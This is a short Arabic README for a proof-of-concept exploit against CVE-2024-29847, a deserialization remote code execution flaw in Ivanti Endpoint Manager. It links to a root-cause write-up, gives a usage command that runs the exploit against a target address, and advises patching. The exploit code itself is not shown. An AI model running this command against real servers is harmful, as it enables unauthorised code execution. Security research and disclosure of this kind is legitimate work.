
استغلال لـ CVE-2024-29847
إثبات المفهوم لثغرة تنفيذ التعليمات البرمجية عن بُعد عبر إلغاء تسلسل البيانات غير الموثوقة في Ivanti Endpoint Manager AgentPortal (CVE-2024-29847)
يمكن العثور على تحليل السبب الجذري للثغرة على مدونتي:
https://summoning.team/blog/ivanti-epm-CVE-2024-29847-deserialization-RCE/
CVE-2024-29847.exe --uselease --installdir "C:\Program Files\LANDesk\ManagementSuite\LANDesk\ManagementSuite\Core\Core.Webservices" tcp://192.168.0.200:49669/LDSM exec test
قم بالتحديث إلى أحدث إصدار أو خفف من المخاطر باتباع هذا الرابط
تم إنشاء هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعالة فقط، وليس المقصود منه استخدامه لمهاجمة الأنظمة إلا في الحالات المصرح بها صراحةً. القائمون على المشروع ليسوا مسؤولين عن أي إساءة استخدام للبرنامج. يُرجى استخدامه بمسؤولية.